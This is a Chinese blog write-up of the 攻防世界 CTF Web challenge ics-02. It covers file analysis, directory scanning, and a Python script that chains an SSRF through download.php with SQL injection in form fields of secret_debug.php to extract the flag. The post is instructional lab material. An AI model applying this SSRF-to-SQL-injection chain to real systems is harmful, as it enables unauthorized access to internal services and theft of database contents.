首页 > 其他分享 >【愚公系列】2023年08月 攻防世界-Web(ics-02)

【愚公系列】2023年08月 攻防世界-Web(ics-02)

时间:2023-08-13 19:36:30浏览次数:39  
标签:02 Web name 08 subquery secret debug pdf php

(文章目录)


前言

SSRF(服务器端请求伪造)是一种攻击技术,攻击者通过构造恶意请求,欺骗服务器发起外部请求,获取服务器本应该不被直接访问的信息或服务。攻击者可利用 SSRF 进行一系列攻击,包括对内部资源进行扫描、窃取敏感信息、攻击内部系统等。

SQL 注入是一种常见的 Web 攻击技术,攻击者通过在输入框等用户交互界面中注入 SQL 代码,进而控制数据库操作,例如读取、修改、删除等。攻击者可通过 SQL 注入进行窃取敏感信息、篡改数据,或直接攻击数据库服务器等。SQL 注入攻击容易发现,但往往对于未进行有效防范的 Web 应用带来重大影响。

一、ics-02

1.题目

在这里插入图片描述

2.答题

2.1 binwalk分析文件

在这里插入图片描述 进入文档中心 在这里插入图片描述 下载下来的php文件打不开,file查看下文件类型 在这里插入图片描述 发现是pdf文件,重命名文件打开pdf

在这里插入图片描述 得到信息SSRF

2.2 目录扫描

进行网站目录扫描 在这里插入图片描述 发现/secret/目录,访问一下试试

在这里插入图片描述 secret_debug.php提示IP没有权限,似乎与前面提示的ssrf呼应了呢 在这里插入图片描述

secret.php进来是个问卷

在这里插入图片描述

全选第一项试试,发现跳到了私密页面2 在这里插入图片描述 根据secret参数带入secret_debug构造请求:http://61.147.171.105:54562/secret/secret_debug.php?s=3&txtfirst_name=a&txtmiddle_name=b&txtlast_name=c&txtname_suffix=d&txtdob=01/05/2000&txtdl_nmbr=1234&txtretypedl=1234

在这里插入图片描述 发现.pdf加在了s=3后面,&符号导致,所以进行url编码,服务器再解码,.pdf就会加到所有参数最后 在这里插入图片描述

还是有问题,.pdf加在最后一个参数后面会影响其值,所以在参数后面再加一个&,相当于隔断了pdf

注册成功。。注册的参数可以进行sql注入,通过download.php用ssrf对secret_debug.php发起请求进行sql注入

import requests
import random
import urllib

url = 'http://61.147.171.105:52912/download.php'

# subquery = "database()"
# ssrfw
# subquery = "select table_name from information_schema.tables where table_schema='ssrfw' LIMIT 1"
# cetcYssrf
# subquery = "select column_name from information_schema.columns where table_name='cetcYssrf' LIMIT 1"
# secretname -> flag
# subquery = "select column_name from information_schema.columns where table_name='cetcYssrf' LIMIT 1, 1"
# value -> flag{cpg9ssnu_OOOOe333eetc_2018}
subquery = "select value from cetcYssrf LIMIT 1"

id = random.randint(1, 10000000)

d = ('http://127.0.0.1/secret/secret_debug.php?' +
        urllib.parse.urlencode({
            "s": "3",
            "txtfirst_name": "L','1',("+subquery+"),'1'/*",
            "txtmiddle_name": "m",
            "txtLast_name": "y",
            "txtname_suffix": "Esq.",
            "txtdob": "*/,'01/10/2019",
            "txtdl_nmbr": id,
            "txtRetypeDL": id
            }) + "&")


r = requests.get(url, params={"dl": d})
print(r.text)

在这里插入图片描述 得到flag:flag{cpg9ssnu_OOOOe333eetc_2018}

标签:02,Web,name,08,subquery,secret,debug,pdf,php
From: https://blog.51cto.com/u_15437432/7068702

相关文章

  • 2-02-Nacos配置管理-Nacos实现配置管理
    页面新增即可......
  • Nepctf2023 Review 出题思路及WP
    原设计图Flag格式NepCTF{%s}逻辑复原mainUPX拆壳,main函数逻辑复原得到getInputcheckInputFormatdebuggerCheck如果存在,则加密一些数据cotIsDebuggerPresent++checkCRCcheckBreakPoint1checkBreakPoint2thread3FinalCheckcheckCRCCRCcheckcotCRCcheck++c......
  • 【web_逆向02】某易云逆向注意点
    加密入口需要用到a,b,c三个函数a,不需要动,直接copy就行b,标准的第三方库,直接安装即可:npminstallcrypto-js千万不要去抠CryptoJS,希望各位记住这个格式.js的标准第三方库https://www.npmjs.com/c,有点麻烦,库太老了--npm找不到functionc(a,b,c){var......
  • 暑假牛客多校第八场 2023-8-11(H、K)
    H.Insert1,Insert2,Insert3,...算法:栈做法:   我们分析题目发现每个区间的左端点一定是\(1\),而且每个新加入的数\(x\)一定是匹配最靠近它的且未经匹配的\(x-1\)。举个例子,在[1,1,2,2,3]中我们加入一个数\(3\)时由于从左到右的第二个\(2\)是已经和第一个......
  • 【web_逆向01】环境安装
    node.js环境安装官网下载,直接下一步就行安装后,在cmd环境,测试pycharm运行js代码安装node.js插件,安装后记得重启pycharm即可python调用js代码运行,pyexecjs模块pipinstallpyexecjs使用importexecjs#请注意,安装的是pyexecjs.使用的是execjs##1.直接执......
  • Adobe After Effects 2023 v23.5 (macOS, Windows) - 后期特效
    AdobeAfterEffects2023v23.5(macOS,Windows)-后期特效Acrobat、AfterEffects、Animate、Audition、Bridge、CharacterAnimator、Dimension、Dreamweaver、Illustrator、InCopy、InDesign、LightroomClassic、MediaEncoder、Photoshop、PremierePro、AdobeXD请访......
  • Burp Suite Professional / Community 2023.9 (macOS, Linux, Windows) - Web 应用安
    BurpSuiteProfessional/Community2023.9(macOS,Linux,Windows)-Web应用安全、测试和扫描BurpSuiteProfessional,Test,find,andexploitvulnerabilities.请访问原文链接:https://sysin.org/blog/burp-suite-pro-2023/,查看最新版。原创作品,转载请保留出处。作者......
  • Adobe Premiere Pro 2023 v23.5 (macOS, Windows) - 专业视频编辑软件
    AdobePremierePro2023v23.5(macOS,Windows)-专业视频编辑软件Acrobat、AfterEffects、Animate、Audition、Bridge、CharacterAnimator、Dimension、Dreamweaver、Illustrator、InCopy、InDesign、LightroomClassic、MediaEncoder、Photoshop、PremierePro、Adobe......
  • Web通用漏洞--RCE
    Web通用漏洞--RCE漏洞简介RCE远程代码/命令执行漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。RCE漏洞也分为代码执行漏洞和命令执行漏洞,所谓代码执行即通过漏洞点注入参数而使用源代码进行相应的操作,所谓的命令执行就是通过漏洞点注入参数......
  • 2023/08/13
    给定一个带整数键值的链表L,你需要把其中绝对值重复的键值结点删掉。即对每个键值K,只有第一个绝对值等于K的结点被保留。同时,所有被删除的结点须被保存在另一个链表上。例如给定L为21→-15→-15→-7→15,你需要输出去重后的链表21→-15→-7,还有被删除的链表-15→15。输......